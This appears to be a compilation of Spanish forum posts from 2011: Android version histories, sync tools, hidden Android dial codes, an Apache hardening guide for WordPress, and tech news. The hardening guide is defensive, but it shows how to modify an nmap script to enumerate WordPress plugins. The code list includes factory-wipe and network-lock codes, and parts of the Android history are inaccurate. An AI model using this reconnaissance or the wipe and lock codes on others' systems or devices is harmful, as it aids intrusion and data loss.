•Quick Search Box, una caja de búsqueda en la pantalla de inicio que permite buscar entre distintas fuentes (los contactos, el historial del navegador, Google, etc.). Con autocompletado y capacidad de aprendizaje.
•Mejorada la velocidad de la cámara.
•Posibilidad de conectarse a redes VPN, 802.1x.
•Nueva pantalla para controlar la batería, que permite comprobar qué aplicaciones y servicios son los que más consumen. Desde esta pantalla se puede también parar o desinstalar estas aplicaciones
•Las aplicaciones de Android Market aparecen ahora ordenadas por categorías (Aplicaciones, Juegos y Descargas). Para cada categoría podemos consultar las últimas actualizaciones y las aplicaciones más populares. Además para cada aplicación se muestra ahora capturas de pantalla y reviews de otros usuarios.
•Nuevo motor de texto a voz.
Una caracteristica importante es la actualisacion constante de el kernel de Linux 2.6.29 que fue lanzado en septiembre del 2009

Android 2.0/2.1 - Eclair (octubre de 2009). Basada en el kernel 2.6.29, incorporaba compatibilidad con HTML5 y Exchange, mapas de Google mejorados, Bluetooth 2.1 o fondos de pantalla animados.

•Rediseñó la interfaz del navegador, contando ahora con soporte para distintas características de HTML5 (entre ellas la etiqueta vídeo), la posibilidad de hacer zoom con una doble pulsación y thumbnails de los marcadores
•Soporte nativo de flash para la cámara (aparentemente los fabricantes de teléfonos que contaban con flash previamente tuvieron que desarrollar sus propios drivers para superar esta limitación).
•Zoom digital, modo scene, balance de blanco, efectos de color y modo macro.
•Mejoras en el teclado virtual.
•Soporte para nuevos tamaños y resoluciones de pantalla.
•Contactos rápidos.
•Bluetooth 2.1
•Soporte nativo de Facebook.
•Mejoras en Google Maps, que pasaba a ser multitáctil y soportar capas (como Wikipedia).
•Soporte de Microsoft Exchange.
•Mejoras en el calendario.
Todo esto se considera en la version 2.0 que fue sacada en Noviembre del 2009 ya que en diciembre del 2009 se agregaron mas caracteristicas que se consideraria la version 2.1 los arreglos estan tan juntos que se considera la version 2.1 como una revicion de la version 2.0 en esta se que mejoraba la duración de la batería y la estabilidad, la llamada a tres, el GPS, el Bluetooth, y la velocidad de disparo y auto enfoque de la cámara.

•Reconocimiento de voz. Ahora se puede dictar en lugar de escribir en cualquier campo de texto).
•Mejoras en el teclado virtual.
•Galería 3D, al estilo Cover Flow.
•Uso del gesto de "pellizcar" para hacer zoom en el navegador, la galería y en Google Maps.
•Nuevas aplicaciones de reloj/tiempo y noticias.
•Mejoras en Google Maps: sincronización de nuestros sitios favoritos, modo noche y auto completado de búsquedas.
•Google Goggles.
•Mejoras en la duración de la batería.


Android 2.2 - Froyo (mayo de 2010). Basada en el kernel 2.6.32 de Linux, se caracteriza por el aumento de la velocidad, tethering y funcionalidad como punto de acceso WiFi, actualizaciones para Market automáticas y contactos compartidos mediante Bluetooth.

•Actualizaciones automáticas para aplicaciones: Las aplicaciones recibirán actualizaciones automáticas, consiguiendo tener siempre la última versión del software.
•Soporte WiFi IEEE 802.11n
•Soporte para Radio FM.
•Soporte Flash 10.1 y Adobe AIR 2.5
•Soporte de la API gráfica OpenGL 2.0
•Posibilidad de asignar un color de LED en el TrackBall para diferentes eventos del terminal.
•Creación de un compilador JIT que mejora entre 2 y 5 veces en Rendimiento frente a Eclair.
•Tethering por USB y hotspot WiFi
•Incorporación del mismo motor de javascript V8 de Chrome.
•Creación de un sistema de mensajería "en la nube" dotado de un API mediante el cual puedes enviar un mensaje desde la web y hacerlo llegar a un teléfono vía Push.
•Posibilidad de enviar posiciones desde Google Maps al teléfono, usando un plugin del navegador Google Chrome.
•Posibilidad de mover una aplicación instalada desde el teléfono a la tarjeta de memoria, y viceversa.
•Opciones avanzadas de gestión energética
Creada en junio del 2010

Android 2.3 Gingerbre­ad. Basada en el kernel 2.6.33 de Linux


• Lanzamiento: Diciembre 2010
• Funciones: Mejora del soporte de video online, mejora de la gestión de la energía (y consumo de la batería), mejora del teclado virtual, soporte para pagos mediante NFC.
Nota: Abre mas posibilidades para usuarios totalmente conectados.

Android 3.x - Honeycomb


• Lanzamiento: Mayo 2011
• Funciones: Sistema operativo optimizado para tablets, posee plenas funcionalidades multitareas (multitasking) para cambiar de aplicaciones en uso dejando las demás en espera visibles en una columna, soporte Flash y DivX, aparte de los navegadores privados tradicionales integra Dolphin, home page personalizable y widgets.
Nota: Esta versión está optimizada para Tablets, manteniendo en smartphone la versión 2.3

Android 4.0.x - IceCream Sandwich


• Lanzamiento: Finales 2011
• Funciones: Diseñado para todas las plataformas (smartphones, tablets y netbooks de todas las medidas), pantalla principal con imágenes 3D, barras de estado y widgets redimensionables, reconocimiento facial, mejora de reconocimiento de voz; soporte USB para teclados y controles para PS3.
Nota: Novedades y mejoras en la navegación e interfaz, con el objetivo de dinamizar y facilitar la experiencia del usuario.


Android 4.1.2 Jelly Bean

• Seguridad en la depuración USB
• Tiempo restante en las descargas de Google Play
• Interruptores en los ajustes rápidos
• Fotos esféricas
• Multiusuario
• Google Now & Voice Search
• Gesture Typing (Swype)
• Daydream

Android 5.0 Key Lime Pie

Basada en el Kernel 3.8 de Linux

• Fecha lanzamiento prevista:  15-17 Mayo 2013
• Perfiles de rendimiento
• Mejor soporte de dispositivos
• Soporte mejorado redes sociales
• Dibujo de línea de teclado
• Aplicación de Video Chat (videollamadas)
• Función de selección múltiple en los contactos
• Cruze y sincronización SMS de la Sim en múltipes dispositivos
• Preview Aplicaciones (app)

Todas las versiones de Android
#213
Una caída que estaba programa pero era 20 minutos máximo y al final han sido más de 3 horas.

Tiempo off-line: 7:00 hasta las 11:30

CitarDue to ongoing efforts by us to provide the best possible service to
you, we will be performing maintenance on the rack that your server is located
in, it will take place on 07/18/2011.

We will be physically moving your server from its current location to a new
upgraded rack. The Maitenance Window will affect all servers with the
66.118.151.0/24 subnet, and will extend from 07/18/2011 11:00PM, through
07/19/2011 6:00 AM. Individual server downtime is expected to last no longer
than 20 minutes.

All networking and power infrastructure have already been provisioned at the
new rack location. The work to be done during this maintenance window will be to
physically and gracefully shut down the server, move it to the new rack, restore power, and verify by console that the server has restarted.

#214
Programas para sincronizar y guardar en el pc la música, contactos, archivos, videos, direcciones del smartphone. Perefecto para realizar copias de seguridad

Los "itunes" para Android:

AirDroid





Descarga Market (Play Store)

https://play.google.com/store/apps/details?id=com.sand.airdroid&hl=es

AirDroid conecta tu teléfono Android y tu ordenador (PC o Mac) a través de la conexión WiFi sin necesidad de cable USB.

El único requisito es tener un navegador web y tener conectado móvil y ordenador a la misma red WiFi.

Te permite controlar Android a distancia.

*Archivos
Transferir archivos entre los dispositivos Android y ordenadores. Ahora con soporte de arrastrar y soltar.
Corta, copia, pega, busca, renombra o elimina archivos de tu memoria SD.

*SMS
Recibe, envía, reenvía o elimina mensajes SMS.

*Aplicaciones
Instalar, desinstalar, crear copias de seguridad, buscar aplicaciones y procesar por lotes.

*Fotos
Vista previa, elimina, carga, descarga, establecer como papel tapiz y visualiza tus fotos desde tu escritorio.

*Portapapeles
Comparte texto del portapapeles entre el escritorio y el dispositivo.

*Contactos
Agrupa, busca, crea contactos, consulta y elimina registros de llamadas.

*Tonos
Busca, visualiza, carga, descarga, elimina y personaliza tonos de llamadas, notificaciones y alarmas.

*Música
Reproduce, busca, carga, descarga, elimina o define como llamada de teléfono, notificación y tonos de llamada de alarma.


QtADB

http://qtadb.wordpress.com/download/





Características:

   MULTIPLATAFORMA
   Conexión por USB o Wifi (descarga adbwireless del market para activar conexión por wifi)
   Administrador de archivos

   -copiar, borrar y crear archivos/directorios en la memoria interna y externa

     Administrador de aplicaciones

   -Instalar, desinstalar y buscar actualizaciones en market y appbrain
   -crear y restaurar backups con configuraciones en /sdcard/QtADB/backups

   Integra una shell
   Visor logcat
   Capturas de pantalla
   Posibilidad de reiniciar en:

   -bootloader
   -recovery
   -normal reboot

[youtube=425,350]http://www.youtube.com/watch?v=H3drxktKIyU[/youtube]


Android Sync Manager WiFi





Android Manager WiFi es un nuevo software para PC que busca compensar una de las principales carencias de Android: la ausencia de una plataforma propia que permita sincronizar un dispositivo Android con el ordenador. Su instalación está reservada para equipos que corran bajo Windows. Permite enlazar ambos terminales y gestionar archivos a través de Wifi, sin recurrir a conectores USB ni emplear tethering. El enlace es automático e inalámbrico.
La herramienta es gratuita y no contiene anuncios publicitarios. Con ella es posible sincronizar, entre otros elementos, contactos, mensajes, fotos, música, vídeo, aplicaciones... Otra de sus funcionalidades es importar programas desde Windows al móvil (o tablet) en lugar de realizar una descarga directa desde un sitio on line.

El ordenador y el dispositivo deben estar conectados a una misma red Wi-Fi. Para garantizar la seguridad y la privacidad, se ha habilitado un número de identificación personal o PIN. Los archivos se pueden manejar desde el ordenador, lo que aumenta la sencillez. Es más cómodo gestionar los contenidos con el ratón que con los dedos o un lápiz electrónico. También ofrece la opción de administrar aplicaciones, recibir y responder mensajes desde el escritorio.


doubleTwist

Sincroniza fotos, vídeos y música con cualquier dispositivo móvil

http://www.doubletwist.com/dt/Home/Index.dt




Android Commander

Página oficial: http://androidcommander.com/




Sony PC Companion

PC Companion es un conjunto de herramientas y aplicaciones que puedes usar cuando conectes tu dispositivo a un ordenador. PC Companion incluye Xperia™ Transfer, una herramienta para mover los contenidos de un iPhone a tu nuevo dispositivo Xperia™. PC Companion también ofrece actualizaciones del software del dispositivo, administración de los contactos y el calendario y una función para crear y restaurar copias de seguridad del contenido del teléfono (la disponibilidad de las aplicaciones depende del teléfono y el operador). También puedes transferir y organizar tus contenidos multimedia con la aplicación Media Go. Con el paso del tiempo, se podrán añadir y descargar más aplicaciones conforme Sony o el operador las ponga a disposición de los usuarios.

Descarga Pc Companion

Versión: 2.10.136 (Prod 28)
Tamaño de archivo: 26,4 MB

Samsung Kies

Kies (Para teléfonos Samsung)

- Conectar móvil sin cables
Conecta un móvil a Kies via Wi-Fi y sincroniza contenidos.
Kies via Wi-Fi te permite disfrutar Kies de una forma muy conveniente. (OTA, over the air)


- Mantén tu móvil actualizado
Cuando estes conectado, Kies te notificará automáticamente si existe un nuevo firmware. Ten tu móvil mejorado con el último firmware.


- Sincronización de contactos con Outlook,Google o Yahoo
Añade y edita contactos del teléfono con Kies.
Tambien, sincroniza contactos con otros en Outlook, Google o Yahoo.


Descarga Samsung Kies

Tutorial
http://www.samsung.com/es/support/mobilesoftwaremanual/kiesTutorial.do


LG PC Suite


LG PC Suite IV

Descargue e instale PC SUITE para :

   - Actualizar el software de su teléfono
   - Gestionar sus fotos, vídeos y música
   - Sincronizar sus contactos y su calendario.

Descargar PC Suite IV
#215
Android / Códigos ocultos secretos en Android
13 Julio 2011, 09:57 AM
Nota:
Marcar el código con el marcardo del teléfono, cómo si fueras a llamar a alguien:

*#*#4636#*#*

Información de tu batería:

– Información del teléfono
– Información de la batería
– Historial de la batería
– Estadísticas de uso

*#*#7780#*#*

Este código sirve para hacer un reset de fábrica. Borrará las siguientes cosas:

– Los ajustes de tu cuenta Google en el teléfono
– Ajustes del sistema y de las aplicaciones
– Aplicaciones descargadas en la SD (descargadas, no instaladas)

No borra:

– El software y las aplicaciones que tengas instaladas
– Los archivos de la SD.

*2767*3855#

Advertencia: este código nos hará un reset de fábrica completo (wipe total). Borrando todos los archivos de la memoria interna y reinstalará el firmware.

*#*#34971539#*#*

Información tu cámara.

– Actualizar el firmware de la cámara (No coger está opción)
– Actualizar el firmware de la cámara en la SD
– Sobre la versión del firmware de la cámara

*#*#7594#*#*

Con este código se apagará directamente tu teléfono, sin pasar por el menú.

*#*#273283*255*663282*#*#*

Nos abre una pantalla que te permite copiar tus archivos multimedia.

*#*#197328640#*#*

Para acceder al modo Servicio (sirve para realizar deiferentes tests) y utilizar los siguientes códigos

*#*#232339#*#* O bien *#*#526#*#* OR *#*#528#*#* – WLAN test

*#*#232338#*#* – Enseña la dirección MAC actual

*#*#1472365#*#* – GPS test

*#*#1575#*#* – Otro GPS test

*#*#232331#*#* – Bluetooth test

*#*#232337#*# – Muestra la dirección del terminal Bluetooth

*#*#8255#*#* Abres el monitor de Gtalk.

Códigos para obtener información del Firmware:

*#*#4986*2650468#*#* – PDA, Phone, H/W, RFCallDate

*#*#1234#*#* – PDA and Phone

*#*#1111#*#* – FTA SW Version

*#*#2222#*#* – FTA HW Version

*#*#44336#*#* – PDA, Phone, CSC, Build Time, Changelist number

Códigos para ejecutar diferentes tests de fábrica:

*#*#0283#*#* – Packet Loopback

*#*#0*#*#* – LCD test

*#*#0673#*#* OR *#*#0289#*#* – Melody test

*#*#0842#*#* – Device test (Vibration test and BackLight test)

*#*#2663#*#* – Touch screen version

*#*#2664#*#* – Touch screen test

*#*#0588#*#* – Proximity sensor test

*#*#3264#*#* – RAM version





MOST CODES SHOULD ALSO WORK ON 2.3.3

*#*#4636#*#* for battery and other general setttings like GSM/CDMA
*#*#8255#*#* for Gtalk service monitor
*#*#7780#*#* for factory data reset
*#*#34971539#*#* for information about phone camera (be very careful hitting options here)
*#*#7594#*#* change the "Power" button action in your phone.
*#*#197328640#*#* service mode
*#197238640# service mode
*#0*# testing mode
*#1234# display phones current firmware
*#*#1472365#*#* gps test
*#0011# network mode/cell info/power info
*#*#0*#*#* screen test menu
*#7465625# engineering mode
*#3214789650# gps service menu for JP3 fw
*#9900# Sysdump screen.. some sort of way to dump ram and other logs to sd card
*2767*3855# FACTORY DATA WIPE AND internal SD RESET as soon as you enter # use only if you want wipe your phone
*#*#273283*255*663282*#*#* Opens a File copy screen where you can backup your media files


Nuevos códigos Froyo

*#1234# (View SW Version PDA, CSC, MODEM)
*#12580*369# (SW & HW Info)
*#197328640# (Service Mode)
*#0228# (ADC Reading)
*#32489# (Ciphering Info)
*#232337# (Bluetooth Address)
*#232331# (Bluetooth Test Mode)
*#232338# (WLAN MAC Address)
*#232339# (WLAN Test Mode)
*#0842# (Vibra Motor Test Mode)
*#0782# (Real Time Clock Test)
*#0673# (Audio Test Mode)
*#0*# (General Test Mode)
*#2263# (RF Band Selection)
*#9090# (Diagnostic ConfiguratioN)
*#7284# (USB I2C Mode Control)
*#872564# (USB Logging Control)
*#4238378# (GCF Configuration)
*#0283# (Audio Loopback Control)
*#1575# (GPS Control Menu)
*#3214789650# (LBS Test Mode)
*#745# (RIL Dump Menu)
*#746# (Debug Dump Menu)
*#9900# (System Dump Mode)
*#44336# (Sofware Version Info)
*#7780# (Factory Reset)
*2767*3855# (Full Factory Reset)
*#0289# (Melody Test Mode)
*#2663# (TSP / TSK firmware update)
*#03# (NAND Flash S/N)
*#0589# (Light Sensor Test Mode)
*#0588# (Proximity Sensor Test Mode)
*#273283*255*3282*# (Data Create Menu)
*#273283*255*663282*# (Data Create SD Card)
*#3282*727336*# (Data Usage Status)
*#7594# (Remap Shutdown to End Call TSK)
*#34971539# (Camera Firmware Update)
*#526# (WLAN Engineering Mode)
*#528# (WLAN Engineering Mode)
*#7412365# (Camera Firmware Menu)
*#80# (Unknown)
*#07# (Test History)
*#3214789# (GCF Mode Status)
*#272886# (Auto Answer Selection)
*#8736364# (OTA Update Menu)
*#301279# (HSDPA/HSUPA Control Menu)
*#7353# (Quick Test Menu)
*2767*4387264636# (Sellout SMS / PCODE view)
*#7465625# (View Phone Lock Status)
*7465625*638*# (Configure Network Lock MCC/MNC)
#7465625*638*# (Insert Network Lock Keycode)
*7465625*782*# (Configure Network Lock NSP)
#7465625*782*# (Insert Partitial Network Lock Keycode)
*7465625*77*# (Insert Network Lock Keycode SP)
#7465625*77*# (Insert Operator Lock Keycode)
*7465625*27*# (Insert Network Lock Keycode NSP/CP)
#7465625*27*# (Insert Content Provider Keycode)
*#272*imei#* Product code , works on Froyo
#216
A raíz del post "Listar los plugins de WordPress" en "Un informático en el lado del mal", vamos a ver una configuración de Apache que evite revelar la presencia de los plugins y otras opciones.

La configuración del VirtualHost debería ser similar a la siguiente, recortando algunas partes irrelevantes:

<VirtualHost *:80>
    ServerAdmin webmaster@dummy-host.example.com
    DocumentRoot "/var/www/blog/htdocs/"
    ServerName systemadmin.es
    DirectoryIndex index.php

        <Directory /var/www/blog/htdocs/>
            Options FollowSymLinks
            AllowOverride None
            Order deny,allow
            Allow from all
        </Directory>

     <Files wp-login.php>
      Order Deny,Allow
      Allow from 1.2.3.4
      Deny from All
   </Files>

        <Directory /var/www/blog/htdocs/wp-admin>
            Options FollowSymLinks
            AllowOverride None
            Order Deny,Allow
            Allow from 1.2.3.4
            Deny from All
        </Directory>

   <Filesmatch  ^wp-config.php$>
      Deny from all
   </Filesmatch>

   <Directory /var/www/blog/htdocs/wp-content/plugins>
      DirectorySlash Off
   </Directory>

RewriteEngine On

RewriteCond %{REQUEST_URI} !/(about|wp-includes|wp-content|images|wp-admin|wp-login)/
RewriteCond %{REQUEST_URI} !/(about|google|sitemap|wp-comments-post.php|wp-login.php|favicon.ico|xmlrpc.php|buscador.xml)
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</VirtualHost>

Las partes importantes son:

    Deshabilitar mod_autoindex: Se trata de un modulo de Apache para hacer listados del contenido de los directorios.

    Personalmente prefiero eliminar dicho modulo de apache al instalarlo mediante la opción de configure –disable-autoindex. Podemos comprobar si esta cargado el modulo mediante httpd -M:

    # /usr/local/apache22/bin/httpd -M | grep index
    Syntax OK

    Deshabilitar el .htaccess: Independientemente por la perdida de rendimiento que supone el htaccess, supone un riesgo permitir que un fichero pueda modificar la configuración de apache, por esto lo deshabilitamos mediante:

    AllowOverride None

    La configuración que tengamos en el .htaccess la deberemos mover a la configuración del VirtualHost. Típicamente los rewrites, a los que deberemos añadir la siguiente regla antes de cualquier RewriteCond o RewriteRule:

    RewriteEngine On

    Restricciones por IP en wp-login.php y wp-admin: En el caso que sea un blog personal lo podemos limitar a nuestra IP o si la tenemos dinámica siempre podemos usar OpenVPN para restringir el acceso, además de cifrar las comunicaciones. En la configuración de Apache indicamos mediante el Allow que IPs permitimos:

    Order Deny,Allow
    Allow from 1.2.3.4
    Deny from All

    Proteger archivos sensibles como por ejemplo el wp-config.php: Los ficheros con configuración del blog, por ejemplo los datos de conexión al MySQL no son nunca servidos, sino que se leen desde otro PHP. Así, podemos denegar que sean servidos.

    En condiciones normales, aunque sean servidos por el Apache, sería una página en blanco pero en el caso que falle el modulo de PHP (o exista un error en al configuración del Apache referente al PHP) se podría servir el contenido del fichero sin ejecutar. Esto pasó, ya hace años, a un proveedor de alojamiento gratuito muy conocido en España publicándose un montón de contraseñas.

    La configuración que evita que dicho fichero sea servido es:

    <Filesmatch  ^wp-config.php$>
       Deny from all
    </Filesmatch>

    Evitar la detección de plugins de WordPress mediante el script http-wp-plugins para nmap. Sin añadir ninguna opción adicional no detecta los plugins ya que en el script vemos lo siguiente:

        local target
        if wp_root then
          -- Give user-supplied argument the priority
          target = wp_root .. "/wp-content/plugins/" .. line .. "/"
        elseif wp_autoroot then
          -- Maybe the script has discovered another WordPress content directory
          target = wp_autoroot .. "wp-content/plugins/" .. line .. "/"
        else
          -- Default WP directory is root
          target = "/wp-content/plugins/" .. line .. "/"
        end

    Realiza una búsqueda del nombre del plugin seguido de una barra, dando siempre 404. Pero el modulo mod_dir si que añade una diferencia que permite detectar si un directorio existe. Por defecto, si el directorio existe pero no le hemos añadido una barra final hace un redirect al directorio con la barra:

    # curl -I systemadmin.es/wp-content/plugins/akismet
    HTTP/1.1 301 Moved Permanently
    Date: Mon, 04 Jul 2011 19:55:28 GMT
    Server: Apache
    Location: http://systemadmin.es:81/wp-content/plugins/akismet/
    Vary: Accept-Encoding
    Content-Type: text/html; charset=iso-8859-1

    # curl -I systemadmin.es/wp-content/plugins/akismet/
    HTTP/1.1 404 Not Found
    Date: Mon, 04 Jul 2011 19:55:30 GMT
    Server: Apache
    Vary: Accept-Encoding
    Content-Type: text/html; charset=iso-8859-1

    Por el contrario, si el directorio no existe no realiza este redirect:

    # curl -I systemadmin.es/wp-content/plugins/noexisto_luego_existo
    HTTP/1.1 404 Not Found
    Date: Mon, 04 Jul 2011 19:55:34 GMT
    Server: Apache
    Vary: Accept-Encoding
    Content-Type: text/html; charset=iso-8859-1

    # curl -I systemadmin.es/wp-content/plugins/noexisto_luego_existo/
    HTTP/1.1 404 Not Found
    Date: Mon, 04 Jul 2011 19:55:36 GMT
    Server: Apache
    Vary: Accept-Encoding
    Content-Type: text/html; charset=iso-8859-1

    Lo que evita que para esta configuración sean detectados los plugins. Pero si modificamos el plugin de nmap para que no incluya la barra final si que los podremos detectar con el mismo diccionario:

        local target
        if wp_root then
          -- Give user-supplied argument the priority
          target = wp_root .. "/wp-content/plugins/" .. line
        elseif wp_autoroot then
          -- Maybe the script has discovered another WordPress content directory
          target = wp_autoroot .. "wp-content/plugins/" .. line
        else
          -- Default WP directory is root
          target = "/wp-content/plugins/" .. line
        end

    Con esta modificación podremos ver como sí que encuentra los plugins instalados dentro del directorio plugins (que no significa que esten habilitados):

    $ nmap -p80 --script=http-wp-plugins --script-arg 'http-wp-plugins.root="/",http-wp-plugins.search=all' systemadmin.es

    Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-07-04 19:41 CEST
    Nmap scan report for systemadmin.es (87.98.227.154)
    Host is up (0.044s latency).
    rDNS record for 87.98.227.154: jordi.prats.systemadmin.es
    PORT   STATE SERVICE
    80/tcp open  http
    | http-wp-plugins:
    | search amongst the 14170 most popular plugins
    (...)
    |   akismet
    (...)

    Nmap done: 1 IP address (1 host up) scanned in 62.73 seconds

    Esta característica que hace detectables los plugins la podemos deshabilitar mediante la opción DirectorySlash. Por lo que podemos añadirla exclusivamente para el directorio de plugins con:

    <Directory /var/www/systemadmin.es/htdocs/wp-content/plugins>
       DirectorySlash Off
    </Directory>

    Una vez aplicados los cambios en el Apache podremos comprobar como el redirect ha desaparecido, comportándose igual con un directorio que existe:

    # curl -I systemadmin.es/wp-content/plugins/akismet
    HTTP/1.1 404 Not Found
    Date: Mon, 04 Jul 2011 19:59:46 GMT
    Server: Apache
    Vary: Accept-Encoding
    Content-Type: text/html; charset=iso-8859-1

    # curl -I systemadmin.es/wp-content/plugins/akismet/
    HTTP/1.1 404 Not Found
    Date: Mon, 04 Jul 2011 19:59:49 GMT
    Server: Apache
    Vary: Accept-Encoding
    Content-Type: text/html; charset=iso-8859-1

    Que con uno que no existe:

    # curl -I systemadmin.es/wp-content/plugins/noexisto_luego_existo
    HTTP/1.1 404 Not Found
    Date: Mon, 04 Jul 2011 19:59:53 GMT
    Server: Apache
    Vary: Accept-Encoding
    Content-Type: text/html; charset=iso-8859-1

    # curl -I systemadmin.es/wp-content/plugins/noexisto_luego_existo/
    HTTP/1.1 404 Not Found
    Date: Mon, 04 Jul 2011 19:59:54 GMT
    Server: Apache
    Vary: Accept-Encoding
    Content-Type: text/html; charset=iso-8859-1

    Por lo que dicho script ya no detecta que plugins de WordPress están instalados:

    $ nmap -p80 --script=http-wp-plugins --script-arg 'http-wp-plugins.root="/",http-wp-plugins.search=all' systemadmin.es

    Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-07-04 20:03 CEST
    Nmap scan report for systemadmin.es (87.98.227.154)
    Host is up (0.038s latency).
    rDNS record for 87.98.227.154: jordi.prats.systemadmin.es
    PORT   STATE SERVICE
    80/tcp open  http
    |_http-wp-plugins: nothing found amongst the 14170 most popular plugins, use --script-arg http-wp-plugins.search=<number|all> for deeper analysis)

    Nmap done: 1 IP address (1 host up) scanned in 62.83 seconds

    Evidentemente, si el diccionario se modificara para buscar ficheros que deben estar presentes en el caso que el plugin este instalado (ficheros de estilo, imagenes...) esto no serviría de nada.

Gracias a estas modificaciones en la configuración del VirtualHost de Apache complicaremos un poco más la identificación y explotación de vulnerabilidades, con la esperanza que se busquen un objetivo más fácil.

Fuente:
http://systemadmin.es/2011/07/configuracion-segura-de-apache-para-wordpress
#217


HTC Desire



HTC Wildfire vs Desire



HTC Desire Vs Iphone



Samsung Galaxy S vs Iphone 4



#218


Muy malas noticias para el esperadísimo lanzamiento de Duke Nukem Forever. Tras casi 14 años en desarrollo, el próximo martes 14 de junio era la fecha señalada para la llegada a las tiendas. Pues bien, desde hace unas horas se ha filtrado el juego completo en varios sitios de BitTorrent.

Los motivos podrían ser el gran impulso y las presiones de miles de fans por intentar que esta espera se redujera, que el embargo se acelerara y llegara cuanto antes. Al parecer, durante las últimas dos semanas habían aparecido varios archivos falsos indicando que DNF se encontraba subido en las redes de intercambio de BitTorrent hasta que finalmente ha sido el famoso grupo 'Complex' el que ha subido el archivo completo real.

Take-Two Interactive y 2K Games, los desarrolladores del juego, podrían enfrentarse a grandes pérdidas en lo que iba ser a buen seguro uno de los títulos del año. Lo que aún está por determinar es cómo y cuando se pudo hacer Complex con el juego y lanzarlo a las redes de intercambio, aunque se apunta que la filtración se debe al enfado de los fans por el excesivo tiempo (14 años) que ha estado en desarrollo.

Posiblemente y después de una historia tan rocambolezca como la que ha tenido el juego, no podría haber tenido otro final. Recordamos que Duke Nukem Forever ha llegado a convertirse en un auténtico meme en la red, llegando a tildar al título de 'vaporgame' por los continuos retrasos, anuncios, confirmaciones que eran finalmente desmentidas o incluso disputas legales entre distintos desarrolladores con demandas de por medio. Esperemos que aún así el juego haya valido la espera.


Fuente:
http://alt1040.com/2011/06/duke-nukem-forever-filtra-bittorrent


2011-06-07 18:23:15 PS3 Duke.Nukem.Forever.PS3-DUPLEX 2745.0MB | 30F
2011-06-07 17:56:21 XBOX360 Duke.Nukem.Forever.XBOX360-COMPLEX 7475.2MB | 73F
#219


¡Precios! El modelo WiFi estará disponible en Japón por 24.980 yenes, en EEUU por 249 dólares y en Europa por 249 euros, mientras que la consola con 3G saldrá por 29.980 yenes, 299 dólares y 299 euros. En palabras Sony, "PS Vita será lanzada en el mercado global a partir de finales de 2011".











CitarCPU
   

ARM Cortex-A9 core (4 núcleos)

GPU
   

SGX543MP4+

Pantalla
   

OLED de 5 pulgadas con resolución de 960 x 544 píxeles

Dimensiones
   

Aprox. 182,0 x 18,6 x 83,5 mm (anchura x altura x profundidad)

Touchpad trasero
   

Multitouchpad (de tipo capacitivo)

Cámaras
   

Frontal y trasera (324x240 a 120 fps y 640x480 y 60 fps)

Sonido
   

Altavoces estéreo integrados
Micrófono integrado

Sensores
   

Sistema de sensores de 6 ejes (Giroscopio de 3 ejes, acelerómetro de 3 ejes)
Brújula de 3 ejes.

Localización
   

GPS integrado
Servicio de localización WiFi

Botones/Interruptores
   

Botón PS
Botón de encendido
Botones direccionales (arriba/Abajo/Izquierda/Derecha)
Botones de acción (triángulo, círculo, cruz, cuadrado)
Botones de gatillo (derecha/izquierda)
Stick analógico derecho, Stick analógico izquierdo
Botón START, Botón SELECT
Botones de volumen (+/-)

Comunicaciones inalámbricas
   

Red de conectividad móvil 3G
IEEE 802.11b/g/n (n = 1x1)(Wi-Fi) (modo Infraestructura/modo Ad-hoc)
Bluetooth® 2.1+EDR A2DP/AVRCP/HSP

Ranuras y conectores
   

Ranura para tarjetas PlayStation Vita, ranura SIM, lector de tarjetas de memoria, puerto multiusos (USB, entrada de corriente, salida de audio estéreo y entrada mono), conector minijack (salida estéreo y entrada mono), puerto de accesorios

Formatos soportados
   

Música: MP3 MPEG-1/2 Audio Layer 3, MP4 (MPEG-4 AAC), WAVE (Linear PCM)
Vídeos: MPEG-4 Simple Profile (AAC), H.264/MPEG-4 AVC Hi/Main/Baseline Profile (AAC)
Fotos: JPEG (Exif 2.2.1), TIFF, BMP, GIF, PNG
#220
Nuevo tráiler de CoD: Modern Warfare 3 con escenas de juego real


[youtube=725,350]http://www.youtube.com/watch?v=coiTJbr9m04[/youtube]
#221
La cantante 'pop' estadounidense Lady Gaga se convirtió en la primera persona que reúne a 10 millones de seguidores en Twitter, informó la red social este lunes.

"@ladygaga acaba de alcanzar 10 millones. ¡Guau!", escribió el servicio de 'microblogs' en un tweet.

Otra estrella del 'pop', el canadiense Justin Bieber, es la segunda persona más seguida en Twitter. Su cuenta @justinbieber tiene cerca de 9,7 millones de seguidores.

El presidente estadounidense, Barack Obama, es el próximo con más de 8,02 millones de seguidores en su cuenta @barackobama.

La cantante estadounidense Britney Spears queda en cuarto lugar (7,8 millones en @britneyspears) y la estrella del 'reality show' Kim Kardashian completa la lista de los cinco 'tuiteros' más seguidos (7,5 millones en @kimkardashian).

© 2011 AFP
#222
linuX-gamers Live 0.9.7 Mayo 2011

Nueva versión sacada este mismo mes con mejoras (nuevos drivers ati y nvidia) y nuevos juegos

Live.Linux-gamers es una distro basada en Arch Linux en formato LiveDVD (no instalable) que como su nombre lo indica está orientada a los juegos. La idea es que todos los juegos pueden ser ejecutados desde el Live DVD sin tocar nuestro disco duro y además tenemos la posibilidad de guardar configuraciones y niveles de los juegos en un dispositivo USB.

LinuX-gamers es un dvd bootable que incluye varios juegos 3D para la plataforma GNU-Linux. Nos ofrecerá la posibilidad de arrancar desde el dvd y empezar a jugar sin necesidad de proceder a la instalación de paquetes o distribución alguna ("boot-and-play"). Incluye los drivers propietarios de Nvidia y Ati para no sufrir problemas de aceleración hardware.








Nexuiz

         


Openarena (Quake)

         


Tremulous

         






Urban Terror





Descarga:

http://mirrors.netdna.com/llg/lglive-0.9.7-i686-hybrid-big.iso
ftp://ftp.holarse-linuxgaming.de/0-Day-Stuff/Live-Linuxgamers-linuxtag2011/lglive-0.9.7-i686-hybrid-big.iso
http://live.linux-gamers.net/iso/lglive-0.9.7-i686-hybrid-big.iso
http://mirrors.netdna.com/llg/lglive-0.9.7-i686-hybrid-big.iso
#224
Servidor Counter Strike 1.6 Steam y Quake III


cs.elhacker.net:27015
quake3.elhacker.net:27960


El staff de ehn (elhacker.NET) os propone jugar on-line. Elegid el juego y el staff jguará contra o con vosotros  :laugh:

El servidor para el juego será un dedicado situado en España (Barcelona) y esperemos que con un ping muy bajo.

ping ns2.elhacker.net

Vota por el juego que prefieres, pero la idea sería ir cambiando de juego cada x tiempo.

Gracias.